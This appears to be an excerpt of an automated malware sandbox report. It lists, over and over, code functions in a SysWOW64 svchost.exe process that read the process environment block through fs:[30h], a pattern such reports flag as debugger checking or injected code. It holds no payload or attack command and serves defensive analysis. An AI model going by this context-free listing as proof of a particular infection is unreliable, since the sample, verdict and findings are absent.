            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D383C0 mov eax, dword ptr fs:[00000030h]2_2_03D383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D383C0 mov eax, dword ptr fs:[00000030h]2_2_03D383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB63C0 mov eax, dword ptr fs:[00000030h]2_2_03DB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03D4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03D4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03D4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D663FF mov eax, dword ptr fs:[00000030h]2_2_03D663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D403E9 mov eax, dword ptr fs:[00000030h]2_2_03D403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D403E9 mov eax, dword ptr fs:[00000030h]2_2_03D403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D403E9 mov eax, dword ptr fs:[00000030h]2_2_03D403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D403E9 mov eax, dword ptr fs:[00000030h]2_2_03D403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D403E9 mov eax, dword ptr fs:[00000030h]2_2_03D403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D403E9 mov eax, dword ptr fs:[00000030h]2_2_03D403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D403E9 mov eax, dword ptr fs:[00000030h]2_2_03D403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D403E9 mov eax, dword ptr fs:[00000030h]2_2_03D403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D28397 mov eax, dword ptr fs:[00000030h]2_2_03D28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D28397 mov eax, dword ptr fs:[00000030h]2_2_03D28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D28397 mov eax, dword ptr fs:[00000030h]2_2_03D28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2E388 mov eax, dword ptr fs:[00000030h]2_2_03D2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2E388 mov eax, dword ptr fs:[00000030h]2_2_03D2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2E388 mov eax, dword ptr fs:[00000030h]2_2_03D2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5438F mov eax, dword ptr fs:[00000030h]2_2_03D5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5438F mov eax, dword ptr fs:[00000030h]2_2_03D5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB035C mov eax, dword ptr fs:[00000030h]2_2_03DB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB035C mov eax, dword ptr fs:[00000030h]2_2_03DB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB035C mov eax, dword ptr fs:[00000030h]2_2_03DB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB035C mov ecx, dword ptr fs:[00000030h]2_2_03DB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB035C mov eax, dword ptr fs:[00000030h]2_2_03DB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB035C mov eax, dword ptr fs:[00000030h]2_2_03DB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DFA352 mov eax, dword ptr fs:[00000030h]2_2_03DFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DD8350 mov ecx, dword ptr fs:[00000030h]2_2_03DD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB2349 mov eax, dword ptr fs:[00000030h]2_2_03DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB2349 mov eax, dword ptr fs:[00000030h]2_2_03DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB2349 mov eax, dword ptr fs:[00000030h]2_2_03DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB2349 mov eax, dword ptr fs:[00000030h]2_2_03DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB2349 mov eax, dword ptr fs:[00000030h]2_2_03DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB2349 mov eax, dword ptr fs:[00000030h]2_2_03DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB2349 mov eax, dword ptr fs:[00000030h]2_2_03DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB2349 mov eax, dword ptr fs:[00000030h]2_2_03DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB2349 mov eax, dword ptr fs:[00000030h]2_2_03DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB2349 mov eax, dword ptr fs:[00000030h]2_2_03DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB2349 mov eax, dword ptr fs:[00000030h]2_2_03DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB2349 mov eax, dword ptr fs:[00000030h]2_2_03DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB2349 mov eax, dword ptr fs:[00000030h]2_2_03DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB2349 mov eax, dword ptr fs:[00000030h]2_2_03DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB2349 mov eax, dword ptr fs:[00000030h]2_2_03DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DD437C mov eax, dword ptr fs:[00000030h]2_2_03DD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2C310 mov ecx, dword ptr fs:[00000030h]2_2_03D2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D50310 mov ecx, dword ptr fs:[00000030h]2_2_03D50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6A30B mov eax, dword ptr fs:[00000030h]2_2_03D6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6A30B mov eax, dword ptr fs:[00000030h]2_2_03D6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6A30B mov eax, dword ptr fs:[00000030h]2_2_03D6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03D3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03D3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03D3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03D3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03D3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D402E1 mov eax, dword ptr fs:[00000030h]2_2_03D402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D402E1 mov eax, dword ptr fs:[00000030h]2_2_03D402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D402E1 mov eax, dword ptr fs:[00000030h]2_2_03D402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6E284 mov eax, dword ptr fs:[00000030h]2_2_03D6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6E284 mov eax, dword ptr fs:[00000030h]2_2_03D6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB0283 mov eax, dword ptr fs:[00000030h]2_2_03DB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB0283 mov eax, dword ptr fs:[00000030h]2_2_03DB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB0283 mov eax, dword ptr fs:[00000030h]2_2_03DB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D402A0 mov eax, dword ptr fs:[00000030h]2_2_03D402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D402A0 mov eax, dword ptr fs:[00000030h]2_2_03D402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DC62A0 mov eax, dword ptr fs:[00000030h]2_2_03DC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03DC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DC62A0 mov eax, dword ptr fs:[00000030h]2_2_03DC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DC62A0 mov eax, dword ptr fs:[00000030h]2_2_03DC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DC62A0 mov eax, dword ptr fs:[00000030h]2_2_03DC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DC62A0 mov eax, dword ptr fs:[00000030h]2_2_03DC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2A250 mov eax, dword ptr fs:[00000030h]2_2_03D2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D36259 mov eax, dword ptr fs:[00000030h]2_2_03D36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DEA250 mov eax, dword ptr fs:[00000030h]2_2_03DEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DEA250 mov eax, dword ptr fs:[00000030h]2_2_03DEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB8243 mov eax, dword ptr fs:[00000030h]2_2_03DB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB8243 mov ecx, dword ptr fs:[00000030h]2_2_03DB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DE0274 mov eax, dword ptr fs:[00000030h]2_2_03DE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DE0274 mov eax, dword ptr fs:[00000030h]2_2_03DE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DE0274 mov eax, dword ptr fs:[00000030h]2_2_03DE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DE0274 mov eax, dword ptr fs:[00000030h]2_2_03DE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DE0274 mov eax, dword ptr fs:[00000030h]2_2_03DE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DE0274 mov eax, dword ptr fs:[00000030h]2_2_03DE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DE0274 mov eax, dword ptr fs:[00000030h]2_2_03DE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DE0274 mov eax, dword ptr fs:[00000030h]2_2_03DE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DE0274 mov eax, dword ptr fs:[00000030h]2_2_03DE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DE0274 mov eax, dword ptr fs:[00000030h]2_2_03DE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DE0274 mov eax, dword ptr fs:[00000030h]2_2_03DE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DE0274 mov eax, dword ptr fs:[00000030h]2_2_03DE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D34260 mov eax, dword ptr fs:[00000030h]2_2_03D34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D34260 mov eax, dword ptr fs:[00000030h]2_2_03D34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D34260 mov eax, dword ptr fs:[00000030h]2_2_03D34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2826B mov eax, dword ptr fs:[00000030h]2_2_03D2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2823B mov eax, dword ptr fs:[00000030h]2_2_03D2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E061E5 mov eax, dword ptr fs:[00000030h]2_2_03E061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03DAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03DAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03DAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03DAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03DAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DF61C3 mov eax, dword ptr fs:[00000030h]2_2_03DF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DF61C3 mov eax, dword ptr fs:[00000030h]2_2_03DF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D601F8 mov eax, dword ptr fs:[00000030h]2_2_03D601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB019F mov eax, dword ptr fs:[00000030h]2_2_03DB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB019F mov eax, dword ptr fs:[00000030h]2_2_03DB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB019F mov eax, dword ptr fs:[00000030h]2_2_03DB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB019F mov eax, dword ptr fs:[00000030h]2_2_03DB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2A197 mov eax, dword ptr fs:[00000030h]2_2_03D2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2A197 mov eax, dword ptr fs:[00000030h]2_2_03D2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2A197 mov eax, dword ptr fs:[00000030h]2_2_03D2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D70185 mov eax, dword ptr fs:[00000030h]2_2_03D70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DEC188 mov eax, dword ptr fs:[00000030h]2_2_03DEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DEC188 mov eax, dword ptr fs:[00000030h]2_2_03DEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DD4180 mov eax, dword ptr fs:[00000030h]2_2_03DD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DD4180 mov eax, dword ptr fs:[00000030h]2_2_03DD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2C156 mov eax, dword ptr fs:[00000030h]2_2_03D2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DC8158 mov eax, dword ptr fs:[00000030h]2_2_03DC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D36154 mov eax, dword ptr fs:[00000030h]2_2_03D36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D36154 mov eax, dword ptr fs:[00000030h]2_2_03D36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DC4144 mov eax, dword ptr fs:[00000030h]2_2_03DC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DC4144 mov eax, dword ptr fs:[00000030h]2_2_03DC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DC4144 mov ecx, dword ptr fs:[00000030h]2_2_03DC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DC4144 mov eax, dword ptr fs:[00000030h]2_2_03DC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DC4144 mov eax, dword ptr fs:[00000030h]2_2_03DC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DDA118 mov ecx, dword ptr fs:[00000030h]2_2_03DDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DDA118 mov eax, dword ptr fs:[00000030h]2_2_03DDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DDA118 mov eax, dword ptr fs:[00000030h]2_2_03DDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DDA118 mov eax, dword ptr fs:[00000030h]2_2_03DDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DF0115 mov eax, dword ptr fs:[00000030h]2_2_03DF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DDE10E mov eax, dword ptr fs:[00000030h]2_2_03DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DDE10E mov ecx, dword ptr fs:[00000030h]2_2_03DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DDE10E mov eax, dword ptr fs:[00000030h]2_2_03DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DDE10E mov eax, dword ptr fs:[00000030h]2_2_03DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DDE10E mov ecx, dword ptr fs:[00000030h]2_2_03DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DDE10E mov eax, dword ptr fs:[00000030h]2_2_03DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DDE10E mov eax, dword ptr fs:[00000030h]2_2_03DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DDE10E mov ecx, dword ptr fs:[00000030h]2_2_03DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DDE10E mov eax, dword ptr fs:[00000030h]2_2_03DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DDE10E mov ecx, dword ptr fs:[00000030h]2_2_03DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D60124 mov eax, dword ptr fs:[00000030h]2_2_03D60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB20DE mov eax, dword ptr fs:[00000030h]2_2_03DB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03D2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D720F0 mov ecx, dword ptr fs:[00000030h]2_2_03D720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03D2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D380E9 mov eax, dword ptr fs:[00000030h]2_2_03D380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB60E0 mov eax, dword ptr fs:[00000030h]2_2_03DB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3208A mov eax, dword ptr fs:[00000030h]2_2_03D3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DF60B8 mov eax, dword ptr fs:[00000030h]2_2_03DF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03DF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DC80A8 mov eax, dword ptr fs:[00000030h]2_2_03DC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D32050 mov eax, dword ptr fs:[00000030h]2_2_03D32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB6050 mov eax, dword ptr fs:[00000030h]2_2_03DB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5C073 mov eax, dword ptr fs:[00000030h]2_2_03D5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D4E016 mov eax, dword ptr fs:[00000030h]2_2_03D4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D4E016 mov eax, dword ptr fs:[00000030h]2_2_03D4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D4E016 mov eax, dword ptr fs:[00000030h]2_2_03D4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D4E016 mov eax, dword ptr fs:[00000030h]2_2_03D4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB4000 mov ecx, dword ptr fs:[00000030h]2_2_03DB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DD2000 mov eax, dword ptr fs:[00000030h]2_2_03DD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DD2000 mov eax, dword ptr fs:[00000030h]2_2_03DD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DD2000 mov eax, dword ptr fs:[00000030h]2_2_03DD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DD2000 mov eax, dword ptr fs:[00000030h]2_2_03DD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DD2000 mov eax, dword ptr fs:[00000030h]2_2_03DD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DD2000 mov eax, dword ptr fs:[00000030h]2_2_03DD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DD2000 mov eax, dword ptr fs:[00000030h]2_2_03DD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DD2000 mov eax, dword ptr fs:[00000030h]2_2_03DD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DC6030 mov eax, dword ptr fs:[00000030h]2_2_03DC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2A020 mov eax, dword ptr fs:[00000030h]2_2_03D2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2C020 mov eax, dword ptr fs:[00000030h]2_2_03D2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03D3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB07C3 mov eax, dword ptr fs:[00000030h]2_2_03DB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D347FB mov eax, dword ptr fs:[00000030h]2_2_03D347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D347FB mov eax, dword ptr fs:[00000030h]2_2_03D347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D527ED mov eax, dword ptr fs:[00000030h]2_2_03D527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D527ED mov eax, dword ptr fs:[00000030h]2_2_03D527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D527ED mov eax, dword ptr fs:[00000030h]2_2_03D527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBE7E1 mov eax, dword ptr fs:[00000030h]2_2_03DBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DD678E mov eax, dword ptr fs:[00000030h]2_2_03DD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D307AF mov eax, dword ptr fs:[00000030h]2_2_03D307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DE47A0 mov eax, dword ptr fs:[00000030h]2_2_03DE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D30750 mov eax, dword ptr fs:[00000030h]2_2_03D30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBE75D mov eax, dword ptr fs:[00000030h]2_2_03DBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72750 mov eax, dword ptr fs:[00000030h]2_2_03D72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72750 mov eax, dword ptr fs:[00000030h]2_2_03D72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB4755 mov eax, dword ptr fs:[00000030h]2_2_03DB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6674D mov esi, dword ptr fs:[00000030h]2_2_03D6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6674D mov eax, dword ptr fs:[00000030h]2_2_03D6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6674D mov eax, dword ptr fs:[00000030h]2_2_03D6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D38770 mov eax, dword ptr fs:[00000030h]2_2_03D38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40770 mov eax, dword ptr fs:[00000030h]2_2_03D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40770 mov eax, dword ptr fs:[00000030h]2_2_03D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40770 mov eax, dword ptr fs:[00000030h]2_2_03D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40770 mov eax, dword ptr fs:[00000030h]2_2_03D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40770 mov eax, dword ptr fs:[00000030h]2_2_03D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40770 mov eax, dword ptr fs:[00000030h]2_2_03D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40770 mov eax, dword ptr fs:[00000030h]2_2_03D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40770 mov eax, dword ptr fs:[00000030h]2_2_03D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40770 mov eax, dword ptr fs:[00000030h]2_2_03D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40770 mov eax, dword ptr fs:[00000030h]2_2_03D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40770 mov eax, dword ptr fs:[00000030h]2_2_03D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40770 mov eax, dword ptr fs:[00000030h]2_2_03D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D30710 mov eax, dword ptr fs:[00000030h]2_2_03D30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D60710 mov eax, dword ptr fs:[00000030h]2_2_03D60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6C700 mov eax, dword ptr fs:[00000030h]2_2_03D6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6273C mov eax, dword ptr fs:[00000030h]2_2_03D6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6273C mov ecx, dword ptr fs:[00000030h]2_2_03D6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6273C mov eax, dword ptr fs:[00000030h]2_2_03D6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAC730 mov eax, dword ptr fs:[00000030h]2_2_03DAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6C720 mov eax, dword ptr fs:[00000030h]2_2_03D6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6C720 mov eax, dword ptr fs:[00000030h]2_2_03D6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03D6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03D6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03DAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03DAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03DAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03DAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB06F1 mov eax, dword ptr fs:[00000030h]2_2_03DB06F1
